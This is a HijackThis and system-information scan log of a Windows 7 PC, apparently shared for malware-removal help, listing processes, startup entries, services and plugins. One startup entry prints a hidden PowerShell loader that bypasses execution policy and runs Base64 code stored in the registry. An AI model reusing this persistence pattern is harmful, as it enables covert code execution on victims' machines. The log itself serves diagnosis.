Logfile of random's system information tool 1.10 (written by random/random) Run by DACAT Computer's at 2016-09-07 16:20:34 Microsoft Windows 7 Ultimate Service Pack 1 System drive C: has 3 GB (3%) free of 100 GB Total RAM: 2510 MB (36% free) Logfile of Trend Micro HijackThis v2.0.4 Scan saved at 16:20:46, on 07/09/2016 Platform: Windows 7 SP1 (WinNT 6.00.3505) MSIE: Internet Explorer v8.00 (8.00.7601.17514) Boot mode: Normal Running processes: C:\Windows\system32\Dwm.exe C:\Windows\Explorer.EXE C:\Program Files\USB Disk Security\USBGuard.exe C:\Windows\System32\hkcmd.exe C:\Windows\System32\igfxpers.exe C:\Windows\system32\taskhost.exe C:\Program Files\PowerISO\PWRISOVM.EXE C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe C:\Program Files\Windows Sidebar\sidebar.exe C:\Program Files\TuneUp Utilities 2011\TuneUpUtilitiesApp32.exe C:\Windows\system32\wuauclt.exe C:\Windows\system32\taskhost.exe C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\DACAT Computer's\AppData\Roaming\uTorrent\uTorrent.exe C:\Users\DACAT Computer's\AppData\Roaming\uTorrent\updates\3.4.8_42449\utorrentie.exe C:\Users\DACAT Computer's\AppData\Roaming\uTorrent\updates\3.4.8_42449\utorrentie.exe C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\DACAT Computer's\Downloads\RSIT.exe C:\Program Files\trend micro\DACAT Computer's.exe R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896 R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_66\bin\ssv.dll O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_66\bin\jp2ssv.dll O3 - Toolbar: (no name) - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - (no file) O4 - HKLM\..\Run: [UCam_Menu] "C:\Program Files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" "C:\Program Files\CyberLink\YouCam" update "Software\CyberLink\YouCam\2.0" O4 - HKLM\..\Run: [USB Antivirus] C:\Program Files\USB Disk Security\USBGuard.exe O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun O4 - HKLM\..\Run: [IgfxTray] C:\Windows\system32\igfxtray.exe O4 - HKLM\..\Run: [HotKeysCmds] C:\Windows\system32\hkcmd.exe O4 - HKLM\..\Run: [Persistence] C:\Windows\system32\igfxpers.exe O4 - HKLM\..\Run: [PWRISOVM.EXE] C:\Program Files\PowerISO\PWRISOVM.EXE -startup O4 - HKLM\..\Run: [BullGuard] "C:\Program Files\BullGuard Ltd\BullGuard\BullGuard.exe" -boot O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun O4 - HKCU\..\Run: [GoogleChromeAutoLaunch_66044D0238289D879AA089D4FF4B32EE] "C:\Program Files\Google\Chrome\Application\chrome.exe" --no-startup-window O4 - HKCU\..\Run: [{C278BE4D-C4D5-43CE-B864-81522531FC8F}] C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\xkhmeCjFTW').OkZOV))); O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200 O8 - Extra context menu item: E&xportar a Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office14\EXCEL.EXE/3000 O9 - Extra button: Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll O9 - Extra 'Tools' menuitem: &Enviar a OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll O9 - Extra button: Report to BullGuard - {27FD17FB-CF63-486b-B2BE-8D8781CBEA01} - C:\Program Files\BullGuard Ltd\BullGuard\Antiphishing\IE\BGAntiphishingIE.dll O9 - Extra button: Notas &vinculadas de OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll O9 - Extra 'Tools' menuitem: Notas &vinculadas de OneNote - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll O9 - Extra button: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll O9 - Extra 'Tools' menuitem: Skype Plug-In - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll O18 - Protocol: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL O23 - Service: @%SystemRoot%\system32\aelupsvc.dll,-1 (AeLookupSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe O23 - Service: AMD External Events Utility - AMD - C:\Windows\system32\atiesrxx.exe O23 - Service: @%systemroot%\system32\appidsvc.dll,-100 (AppIDSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\appinfo.dll,-100 (Appinfo) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe O23 - Service: @appmgmts.dll,-3250 (AppMgmt) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\audiosrv.dll,-204 (AudioEndpointBuilder) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\audiosrv.dll,-200 (Audiosrv) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\AxInstSV.dll,-103 (AxInstSV) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\bdesvc.dll,-100 (BDESVC) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\bfe.dll,-1001 (BFE) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\qmgr.dll,-1000 (BITS) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: Servicio Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe O23 - Service: @%systemroot%\system32\browser.dll,-100 (Browser) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: BullGuard backup service (BsBackup) - Unknown owner - C:\Windows\System32\SvcHost.exe O23 - Service: BullGuard Behavioural Detection (BsBhvScan) - BullGuard Ltd. - C:\Program Files\BullGuard Ltd\BullGuard\BullGuardBhvScanner.exe O23 - Service: BullGuard cache service (BsCache) - Unknown owner - C:\Windows\System32\SvcHost.exe O23 - Service: BullGuard on-access service (BsFileScan) - Unknown owner - C:\Windows\System32\SvcHost.exe O23 - Service: BullGuard firewall service (BsFire) - Unknown owner - C:\Windows\System32\SvcHost.exe O23 - Service: BullGuard e-mail monitoring service (BsMailProxy) - Unknown owner - C:\Windows\System32\SvcHost.exe O23 - Service: BullGuard Main Service (BsMain) - Unknown owner - C:\Windows\System32\SvcHost.exe O23 - Service: BullGuard scanning service (BsScanner) - BullGuard Ltd. - C:\Program Files\BullGuard Ltd\BullGuard\BullGuardScanner.exe O23 - Service: BullGuard update service (BsUpdate) - BullGuard Ltd. - C:\Program Files\BullGuard Ltd\BullGuard\BullGuardUpdate.exe O23 - Service: @%SystemRoot%\System32\bthserv.dll,-101 (bthserv) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\certprop.dll,-11 (CertPropSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\cryptsvc.dll,-1001 (CryptSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\cscsvc.dll,-200 (CscService) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @oleres.dll,-5012 (DcomLaunch) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\defragsvc.dll,-101 (defragsvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\dhcpcore.dll,-100 (Dhcp) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\dnsapi.dll,-101 (Dnscache) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\dot3svc.dll,-1102 (dot3svc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\dps.dll,-500 (DPS) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%systemroot%\system32\eapsvc.dll,-1 (EapHost) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\ehome\ehrecvr.exe,-101 (ehRecvr) - Unknown owner - C:\Windows\ehome\ehRecvr.exe O23 - Service: @%SystemRoot%\ehome\ehsched.exe,-101 (ehSched) - Unknown owner - C:\Windows\ehome\ehsched.exe O23 - Service: @%SystemRoot%\system32\wevtsvc.dll,-200 (eventlog) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @comres.dll,-2450 (EventSystem) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\fdPHost.dll,-100 (fdPHost) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\fdrespub.dll,-100 (FDResPub) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\FntCache.dll,-100 (FontCache) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @gpapi.dll,-112 (gpsvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: Servicio de Google Update (gupdate) (gupdate) - Unknown owner - C:\Program Files\Google\Update\GoogleUpdate.exe O23 - Service: Servicio de Google Update (gupdatem) (gupdatem) - Unknown owner - C:\Program Files\Google\Update\GoogleUpdate.exe O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe O23 - Service: @%SystemRoot%\System32\hidserv.dll,-101 (hidserv) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\kmsvc.dll,-6 (hkmsvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\ListSvc.dll,-100 (HomeGroupListener) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\provsvc.dll,-100 (HomeGroupProvider) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: HP Service (hpsrv) - Hewlett-Packard Company - C:\Windows\system32\Hpservice.exe O23 - Service: @%SystemRoot%\system32\ikeext.dll,-501 (IKEEXT) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\IPBusEnum.dll,-102 (IPBusEnum) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\iphlpsvc.dll,-500 (iphlpsvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: Servicio del iPod (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe O23 - Service: @comres.dll,-2946 (KtmRm) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%systemroot%\system32\srvsvc.dll,-100 (LanmanServer) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\wkssvc.dll,-100 (LanmanWorkstation) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\lltdres.dll,-1 (lltdsvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\lmhsvc.dll,-101 (lmhosts) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\mmcss.dll,-100 (MMCSS) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe O23 - Service: @%SystemRoot%\system32\FirewallAPI.dll,-23090 (MpsSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe O23 - Service: @%SystemRoot%\system32\iscsidsc.dll,-5000 (MSiSCSI) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\msimsg.dll,-27 (msiserver) - Unknown owner - C:\Windows\system32\msiexec.exe O23 - Service: @%SystemRoot%\system32\qagentrt.dll,-6 (napagent) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\netman.dll,-109 (Netman) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\netprofm.dll,-202 (netprofm) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\nlasvc.dll,-1 (NlaSvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\nsisvc.dll,-200 (nsi) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8004 (p2pimsvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\p2psvc.dll,-8006 (p2psvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\pcasvc.dll,-1 (PcaSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\peerdistsvc.dll,-9000 (PeerDistSvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%systemroot%\system32\pla.dll,-500 (pla) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\umpnpmgr.dll,-100 (PlugPlay) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\pnrpauto.dll,-8002 (PNRPAutoReg) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\pnrpsvc.dll,-8000 (PNRPsvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\polstore.dll,-5010 (PolicyAgent) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\umpo.dll,-100 (Power) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\profsvc.dll,-300 (ProfSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\qwave.dll,-1 (QWAVE) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%Systemroot%\system32\rasauto.dll,-200 (RasAuto) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%Systemroot%\system32\rasmans.dll,-200 (RasMan) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @regsvc.dll,-1 (RemoteRegistry) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%windir%\system32\RpcEpMap.dll,-1001 (RpcEptMapper) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe O23 - Service: @oleres.dll,-5010 (RpcSs) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\SCardSvr.dll,-1 (SCardSvr) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\schedsvc.dll,-100 (Schedule) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\certprop.dll,-13 (SCPolicySvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\sdrsvc.dll,-107 (SDRSVC) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\seclogon.dll,-7001 (seclogon) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\Sens.dll,-200 (SENS) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\sensrsvc.dll,-1000 (SensrSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\SessEnv.dll,-1026 (SessionEnv) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\ipnathlp.dll,-106 (SharedAccess) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\shsvcs.dll,-12288 (ShellHWDetection) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe O23 - Service: @%SystemRoot%\system32\sppuinotify.dll,-103 (sppuinotify) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\ssdpsrv.dll,-100 (SSDPSRV) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\sstpsvc.dll,-200 (SstpSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\wiaservc.dll,-9 (StiSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\swprv.dll,-103 (swprv) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\sysmain.dll,-1000 (SysMain) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\TabSvc.dll,-100 (TabletInputService) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\tapisrv.dll,-10100 (TapiSrv) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\tbssvc.dll,-100 (TBS) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\termsrv.dll,-268 (TermService) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\themeservice.dll,-8192 (Themes) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%systemroot%\system32\mmcss.dll,-102 (THREADORDER) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\trkwks.dll,-1 (TrkWks) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe O23 - Service: TuneUp Utilities Service (TuneUp.UtilitiesSvc) - TuneUp Software - C:\Program Files\TuneUp Utilities 2011\TuneUpUtilitiesService32.exe O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe O23 - Service: @%SystemRoot%\system32\umrdp.dll,-1000 (UmRdpService) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%systemroot%\system32\upnphost.dll,-213 (upnphost) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\dwm.exe,-2000 (UxSms) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\uxtuneup.dll,-4096 (UxTuneUp) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe O23 - Service: @%SystemRoot%\system32\w32time.dll,-200 (W32Time) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe O23 - Service: @%systemroot%\system32\wbiosrvc.dll,-100 (WbioSrvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\wcncsvc.dll,-3 (wcncsvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\WcsPlugInService.dll,-200 (WcsPlugInService) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%systemroot%\system32\wdi.dll,-502 (WdiServiceHost) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%systemroot%\system32\wdi.dll,-500 (WdiSystemHost) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%systemroot%\system32\webclnt.dll,-100 (WebClient) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\wecsvc.dll,-200 (Wecsvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\wercplsupport.dll,-101 (wercplsupport) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\wersvc.dll,-100 (WerSvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%ProgramFiles%\Windows Defender\MsMpRes.dll,-103 (WinDefend) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\system32\winhttp.dll,-100 (WinHttpAutoProxySvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%Systemroot%\system32\wbem\wmisvc.dll,-205 (Winmgmt) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%Systemroot%\system32\wsmsvc.dll,-101 (WinRM) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%SystemRoot%\System32\wlansvc.dll,-257 (Wlansvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files\Windows Media Player\wmpnetwk.exe O23 - Service: @%SystemRoot%\system32\wpcsvc.dll,-100 (WPCSvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\wpdbusenum.dll,-100 (WPDBusEnum) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\wscsvc.dll,-200 (wscsvc) - Unknown owner - C:\Windows\System32\svchost.exe O23 - Service: @%systemroot%\system32\SearchIndexer.exe,-103 (WSearch) - Unknown owner - C:\Windows\system32\SearchIndexer.exe O23 - Service: @%systemroot%\system32\wuaueng.dll,-105 (wuauserv) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\system32\wudfsvc.dll,-1000 (wudfsvc) - Unknown owner - C:\Windows\system32\svchost.exe O23 - Service: @%SystemRoot%\System32\wwansvc.dll,-257 (WwanSvc) - Unknown owner - C:\Windows\system32\svchost.exe -- End of file - 23055 bytes ======Scheduled tasks folder====== C:\Windows\tasks\GoogleUpdateTaskMachineCore.job - C:\Program Files\Google\Update\GoogleUpdate.exe /c C:\Windows\tasks\GoogleUpdateTaskMachineUA.job - C:\Program Files\Google\Update\GoogleUpdate.exe /ua /installsource scheduler =========Mozilla firefox========= ProfilePath - C:\Users\DACAT Computer's\AppData\Roaming\Mozilla\Firefox\Profiles\s9j1vjhj.default-1456939752632 "antiphishing@bullguard"=C:\Program Files\BullGuard Ltd\BullGuard\Antiphishing\FF\antiphishing@bullguard\ [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer] "Description"=Adobe® Flash® Player 19.0.0.245 Plugin "Path"=C:\Windows\system32\Macromed\Flash\NPSWF32_19_0_0_245.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Apple.com/iTunes,version=] "Description"=Complemento detector de iTunes "Path"= [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Apple.com/iTunes,version=1.0] "Description"= "Path"=C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@Google.com/GoogleEarthPlugin] "Description"=Google Earth in your browser "Path"=C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@google.com/npPicasa3,version=3.0.0] "Description"=Picasa3 plugin "Path"=C:\Program Files\Google\Picasa3\npPicasa3.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.66.2] "Description"=Java™ Deployment Toolkit "Path"=C:\Program Files\Java\jre1.8.0_66\bin\dtplugin\npDeployJava1.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.66.2] "Description"=Oracle® Next Generation Java™ Plug-In "Path"=C:\Program Files\Java\jre1.8.0_66\bin\plugin2\npjp2.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0] "Description"=Office Authorization plug-in for NPAPI browsers "Path"=C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/SharePoint,version=14.0] "Description"=Microsoft SharePoint Plug-in for Firefox "Path"=C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@tools.google.com/Google Update;version=3] "Description"=Google Update "Path"=C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll [HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@tools.google.com/Google Update;version=9] "Description"=Google Update "Path"=C:\Program Files\Google\Update\1.3.31.5\npGoogleUpdate3.dll ======Registry dump====== [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}] Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2010-11-15 62376] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}] Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_66\bin\ssv.dll [2015-11-26 460384] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}] Skype Plug-In - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2010-11-22 1242504] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B4F3A835-0E21-4959-BA22-42B3008E02FF}] Office Document Cache Handler - C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL [2010-02-27 561552] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}] Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_66\bin\jp2ssv.dll [2015-11-26 172640] [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar] {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run] "UCam_Menu"=C:\Program 